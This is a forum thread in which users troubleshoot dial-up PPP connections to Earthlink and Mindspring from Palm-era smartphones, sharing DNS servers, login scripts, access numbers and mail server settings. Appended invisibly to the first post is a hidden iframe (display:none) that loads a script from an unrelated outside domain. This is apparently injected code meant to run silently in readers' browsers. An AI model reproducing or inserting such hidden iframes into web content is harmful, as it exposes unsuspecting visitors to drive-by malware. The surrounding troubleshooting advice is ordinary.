+ Reply to Thread

Dial Up Connection to Earthlink Network

Yes, I did a search to resolve this first and even PM'd Alanb fo rhelp as he is much more astute than I in these areas.

What I am trying to do is use an Earthlink local dialup connection to retrieve my email so I can use it when I can't get a qnc connection.

I worked with Alan on getting this done and just finally tested it on a notebook PC dialup connection to verify all information works. (ie. Log in name and password). I tried to call Earthlink as well but evidently weekends they have short staff and after 45 mins. wait I thought I'd try the board.

Here are my Network settings for the "Earthlink Connection: from PDA Prefs:

Service: Earthlink
    User Name: Same as Notebook that worked
    Password: Same as Notebook that worked
    (and yes I've retyped them several times to make sure they are right)
    Connection: Wireless Modem
    Phone No.: Verified using a Notebook
    Details:
    Connection Type: PPP
    Idel Timeout: Never
    Query DNS: This one I've tried both ways. Unchecked and
    Checked with DNS Servers 207.217.126.81 and 207.217.77.82
    (which are right from Earhtlinks site for "Sprintmail")
    IP address checked to Automatic.

When I hit connect I get "Dialing Earthlink" followed by Cancelling in about 3 - 4 seconds.

Then when I try it again it says "Error: Incorrect or busy
    phone number (ox1103) If I checking the phone side I see that it hasn't hung up. But says "Standard Data Rate" I have to manually end the call.

Any ideas on why this doesn't work?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Kevin,

I had one other thought for you to try. Maybe the particular Earthlink Access number you are dialing has a problem negotiating a connection with the smartphone. I assume you at least have a plan with no long distance, if not unlimited weekends, so why don't you try the Earthlink access number that I was succesful with? It was 240-331-6884

If that doesn't do it, I have one other thought to try and determine if it is a phone/setup problem or a user ID problem, but it involves us trusting each other a good bit. I could let you try my Mindspring user ID and I'll try your Earthlink ID and see if the problem follows the ID or stays with the phone. PM me if you are interested in trying that.

Alan

Converged. It didn't even hurt! tuckeyr's Avatar
    I don't know if this will help, but when I've dialed into earthlink with my Palm, I've also needed script settings as follows:
    Wait for: gin
    Send User ID:
    Send CR:
    Wait for: ssword
    Send Password:
    Send CR:
    End:

Once I had these settings, I was able to connect with no problems.

Tuckey
    Kyo 7135, XV 6600, XV 6700 and iPhone. Thanks to BT GPS, I even know where I stand!

Did any one figure out a way to dial into earthlink without using qnc?

Earthlink/Mindspring Login

User Name: email address (123456@mindspring.com)
    Password: whatever

I am using Kyocera CDMA Wireless Modem (6035)

Under Dial Up Networking Settings:
    TCP/IP and Auto Settings for all

Iuse this for my laptop when I am not at home and it works fine, if not slow.

asmoore,
    I tried your suggestion and was able to set up earthlink as my server and was able to receive, but everytime I try to send, I get error 550. What is your SMTP set up for?

I'm having the same problem with my Nationwide Sprint Dialup account. I get "cancelling" within a couple of seconds, press "Ok", and then see the phone connection light. Checking on the phone side, it has a data connection and I have to end the call manually. My script is the same as shown above. I've tried with a few different access numbers and the result is always the same. Anyone solve this?

Re: Earthlink/Mindspring Login

Originally posted by asmoore
    User Name: email address (123456@mindspring.com)
    Password: whatever

I am using Kyocera CDMA Wireless Modem (6035)

Under Dial Up Networking Settings:
    TCP/IP and Auto Settings for all

Iuse this for my laptop when I am not at home and it works fine, if not slow.
    I've had the same success with my Mindspring account. The settings on the 7135 are about the same (DUN and Prefs-PDA/Network) with no special scripts. However, I had a genuine "Earthlink" ID briefly and as I recall the setups are a little different. I remember needing to call Earthlink for assistance.

Email Settings

incoming: pop.earthlink.net
    Outgoing: smtp.earthlink.net

Earthlink Web Site